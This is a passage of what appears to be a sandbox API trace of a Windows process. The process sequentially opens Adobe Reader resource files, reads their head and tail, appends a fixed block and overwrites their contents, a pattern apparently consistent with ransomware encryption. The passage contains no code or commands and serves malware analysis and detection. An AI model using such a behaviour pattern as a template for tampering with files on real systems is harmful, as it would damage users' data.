nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.966] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0114.966] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0114.966] CloseHandle (hObject=0x1d8) returned 1 [0114.967] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est133.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est133.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0114.967] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0114.967] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x20f800 [0114.967] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0114.968] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.968] ReleaseMutex (hMutex=0x168) returned 1 [0114.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="est133.lex", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="est133.lex", cchWideChar=10, lpMultiByteStr=0x1f735cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="est133.lex", lpUsedDefaultChar=0x0) returned 10 [0114.968] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0114.989] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0115.026] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0115.085] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x20d800 [0115.085] ReadFile (in: hFile=0x1d8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0115.125] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x20d800 [0115.128] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x359f28c*=0x2588, lpOverlapped=0x0) returned 1 [0115.129] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0115.129] WriteFile (in: hFile=0x1d8, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0115.130] WriteFile (in: hFile=0x1d8, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0115.131] WriteFile (in: hFile=0x1d8, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0x2000, lpOverlapped=0x0) returned 1 [0115.131] CloseHandle (hObject=0x1d8) returned 1 [0115.131] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0115.132] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0115.132] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2000 [0115.132] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0115.132] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.133] ReleaseMutex (hMutex=0x168) returned 1 [0115.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="frn.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0115.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="frn.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="frn.hyp", lpUsedDefaultChar=0x0) returned 7 [0115.133] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x359f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0115.428] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0115.428] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x359f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0115.429] CloseHandle (hObject=0x1d8) returned 1 [0115.430] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0115.431] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0115.431] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x59c [0115.431] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0115.431] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.431] ReleaseMutex (hMutex=0x168) returned 1 [0115.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="grm.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0115.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="grm.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="grm.fca", lpUsedDefaultChar=0x0) returned 7 [0115.431] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x59c, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x359f2bc*=0x59c, lpOverlapped=0x0) returned 1 [0115.449] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0115.450] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0xb24, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x359f2d0*=0xb24, lpOverlapped=0x0) returned 1 [0115.450] CloseHandle (hObject=0x1d8) returned 1 [0115.450] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0115.451] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0115.451] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x7fff [0115.451] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0115.451] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.451] ReleaseMutex (hMutex=0x168) returned 1 [0115.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="heb32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0115.451] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="heb32.clx", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="heb32.clx", lpUsedDefaultChar=0x0) returned 9 [0115.451] ReadFile (in: hFile=0x1d8, lpBuffer=0x2866c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.913] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6fff [0115.913] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.961] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6fff [0115.961] WriteFile (in: hFile=0x1d8, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.962] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0115.962] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0115.963] CloseHandle (hObject=0x1d8) returned 1 [0115.963] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0115.964] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0115.964] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x7ff2 [0115.964] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0115.964] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.964] ReleaseMutex (hMutex=0x168) returned 1 [0115.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hun32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0115.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hun32.clx", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hun32.clx", lpUsedDefaultChar=0x0) returned 9 [0115.964] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.500] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6ff2 [0116.500] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.512] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6ff2 [0116.512] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.513] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0116.513] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0116.513] CloseHandle (hObject=0x1d8) returned 1 [0116.513] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0116.514] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0116.514] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x7ff2 [0116.515] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0116.515] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.515] ReleaseMutex (hMutex=0x168) returned 1 [0116.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lav32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0116.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lav32.clx", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lav32.clx", lpUsedDefaultChar=0x0) returned 9 [0116.515] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.526] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6ff2 [0116.526] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.537] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6ff2 [0116.537] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.538] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0116.538] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0116.539] CloseHandle (hObject=0x1d8) returned 1 [0116.539] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0116.540] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0116.540] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x7ff1 [0116.540] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0116.540] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.540] ReleaseMutex (hMutex=0x168) returned 1 [0116.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nrw32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0116.541] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nrw32.clx", cchWideChar=9, lpMultiByteStr=0x1f735cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nrw32.clx", lpUsedDefaultChar=0x0) returned 9 [0116.541] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.545] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6ff1 [0116.545] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.572] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x6ff1 [0116.572] WriteFile (in: hFile=0x1d8, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.574] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0116.574] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0116.574] CloseHandle (hObject=0x1d8) returned 1 [0116.591] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0116.598] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0116.598] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1d000 [0116.598] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0116.598] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.599] ReleaseMutex (hMutex=0x168) returned 1 [0116.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pol.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0116.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pol.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pol.hyp", lpUsedDefaultChar=0x0) returned 7 [0116.599] ReadFile (in: hFile=0x204, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0116.691] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1c000 [0116.692] ReadFile (in: hFile=0x204, lpBuffer=0x2866c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.706] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1c000 [0116.708] 